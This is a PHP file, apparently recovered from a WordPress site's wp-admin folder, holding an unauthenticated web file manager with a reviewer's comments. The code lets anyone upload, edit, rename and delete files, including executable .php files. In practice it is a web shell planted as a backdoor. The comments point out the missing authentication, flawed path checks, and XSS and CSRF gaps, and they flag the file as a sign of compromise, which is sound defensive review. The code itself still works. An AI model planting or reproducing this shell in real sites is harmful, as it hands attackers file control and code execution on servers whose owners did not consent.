File: /home/richfield/text.pio.richfield-egy.com/wp-admin/user/file.php
<?php
// Browser-driven file manager: lists, uploads, creates, deletes, renames and
// edits files under the directory this script lives in (realpath(__DIR__)).
// NOTE(review): no authentication, capability check or CSRF token appears
// anywhere in this file — every branch below is reachable by any HTTP client
// that can fetch the URL. No WordPress bootstrap (wp-load.php) is included, so
// WordPress's own session/nonce checks do not apply. A file with this path is
// not one I recognise from WordPress core; confirm against a clean install and
// treat an unexpected copy as an indicator of compromise.
//
// Request surface (all unvalidated beyond the prefix checks noted inline):
//   GET  path          directory to operate in (default '.')
//   FILES upload       file written into $path
//   POST new_folder    directory created under $path
//   GET  delete        entry under $path removed
//   POST rename_old/rename_new  entry under $path renamed
//   GET  edit (+ POST content)  file under $path read / overwritten

// Directory to work in; '.' (the script's own directory) when absent.
$path = isset($_GET['path']) ? $_GET['path'] : '.';
// realpath() canonicalises and resolves symlinks; it returns false for a
// non-existent path. Without strict_types a false haystack coerces to '' in
// strpos() below, so a missing path ends in the "Access Denied" branch.
$path = realpath($path);
$baseDir = realpath(__DIR__);
// Containment check is a bare string-prefix test. It does not require a
// directory separator after $baseDir, so a sibling directory whose name merely
// starts with $baseDir's name also passes; comparing against
// $baseDir . DIRECTORY_SEPARATOR (or equality) would be the tighter check.
// The same prefix test is reused at the delete, rename and edit branches.
if (strpos($path, $baseDir) !== 0) {
die("Access Denied");
}
// Handle file upload
if (isset($_FILES['upload'])) {
// basename() strips directory components from the client-supplied name, but
// no extension, MIME or size restriction is applied: any file type the
// client names is written into $path as-is.
$uploadPath = $path . '/' . basename($_FILES['upload']['name']);
// Return value (false on failure) is not checked.
move_uploaded_file($_FILES['upload']['tmp_name'], $uploadPath);
// $path is interpolated into the Location header unencoded; urlencode($path)
// would be the safe form (same at every redirect below).
header("Location: ?path=$path");
exit;
}
// Handle folder creation
if (isset($_POST['new_folder'])) {
// Unlike the delete/rename/edit branches, the new name is neither
// canonicalised with realpath() nor checked against $baseDir before use.
mkdir($path . '/' . $_POST['new_folder']);
header("Location: ?path=$path");
exit;
}
// Handle delete
if (isset($_GET['delete'])) {
// realpath() yields false for a missing target; the prefix test then fails
// and nothing is removed.
$target = realpath($path . '/' . $_GET['delete']);
if (strpos($target, $baseDir) === 0) {
if (is_dir($target)) {
// rmdir() only removes an empty directory; the failure is silent.
rmdir($target);
} else {
unlink($target);
}
}
header("Location: ?path=$path");
exit;
}
// Handle rename
if (isset($_POST['rename_old']) && isset($_POST['rename_new'])) {
$old = $path . '/' . $_POST['rename_old'];
$new = $path . '/' . $_POST['rename_new'];
// Only the source is canonicalised and containment-checked; $new is used
// verbatim, so the destination is not held to the $baseDir check.
if (strpos(realpath($old), $baseDir) === 0) {
rename($old, $new);
}
header("Location: ?path=$path");
exit;
}
// Handle file editing
if (isset($_GET['edit'])) {
$editFile = realpath($path . '/' . $_GET['edit']);
// Rejects targets outside $baseDir (same prefix caveat as above) and
// anything that is not a regular file.
if (strpos($editFile, $baseDir) !== 0 || !is_file($editFile)) {
die("Invalid file");
}
if (isset($_POST['content'])) {
// Overwrites the file with the raw POST body; no CSRF protection on the
// form that submits it.
file_put_contents($editFile, $_POST['content']);
header("Location: ?path=$path");
exit;
}
// File body is HTML-escaped before being placed in the <textarea>.
$content = htmlspecialchars(file_get_contents($editFile));
// basename($editFile) is echoed unescaped; a filename containing markup
// would be rendered as HTML.
echo "<h2>Editing File: " . basename($editFile) . "</h2>";
// $path is also interpolated unescaped into the href attribute below.
echo "<form method='POST'>
<textarea name='content' style='width:100%;height:400px;'>$content</textarea><br>
<button type='submit'>💾 Save</button>
<a href='?path=$path'>❌ Cancel</a>
</form>";
exit;
}
// List files and folders
// scandir() returns false on failure; foreach over false only raises a
// warning, so a non-listable directory renders an empty table.
$items = scandir($path);
// $path is emitted into page text and href attributes without
// htmlspecialchars() here and throughout the listing.
echo "<h2>File Manager: $path</h2>";
echo "<a href='?path=" . dirname($path) . "'>⬅️ Back</a><br><br>";
echo "<form method='POST' enctype='multipart/form-data'>
<input type='file' name='upload'>
<button type='submit'>Upload</button>
</form>";
echo "<form method='POST'>
<input type='text' name='new_folder' placeholder='New folder name'>
<button type='submit'>Create Folder</button>
</form><br>";
echo "<table border='1' cellpadding='5'>";
echo "<tr><th>Name</th><th>Actions</th></tr>";
foreach ($items as $item) {
// Loose comparison; '===' is the idiomatic strict form here.
if ($item == '.' || $item == '..') continue;
$itemPath = $path . '/' . $item;
echo "<tr><td>";
// $item (a directory entry name from scandir) and $itemPath are interpolated
// into HTML text, attribute values and the inline confirm() string without
// escaping; a crafted filename on disk therefore renders as markup/script.
if (is_dir($itemPath)) {
echo "<a href='?path=$itemPath'>📁 $item</a>";
} else {
echo "📄 $item";
}
echo "</td><td>
<form method='POST' style='display:inline'>
<input type='hidden' name='rename_old' value='$item'>
<input type='text' name='rename_new' placeholder='New name'>
<button type='submit'>Rename</button>
</form>
<a href='?path=$path&delete=$item' onclick='return confirm(\"Delete $item?\")'>🗑️ Delete</a>";
if (!is_dir($itemPath)) {
// Download link is built by stripping DOCUMENT_ROOT from the absolute path;
// presumably $itemPath is always beneath the document root — if it is not,
// the resulting href is wrong (left as-is, verify against the deployment).
$relativePath = str_replace($_SERVER['DOCUMENT_ROOT'], '', $itemPath);
echo " | <a href='$relativePath' download>⬇️ Download</a>";
$ext = pathinfo($itemPath, PATHINFO_EXTENSION);
// Extensions offered for in-browser editing (includes executable .php).
$editableExts = ['php', 'html', 'htm', 'txt', 'css', 'js'];
// in_array() without the strict flag; harmless for string-vs-string here
// but `true` as the third argument is the conventional form.
if (in_array(strtolower($ext), $editableExts)) {
echo " | <a href='?path=$path&edit=$item'>✏️ Edit</a>";
}
}
echo "</td></tr>";
}
echo "</table>";
?>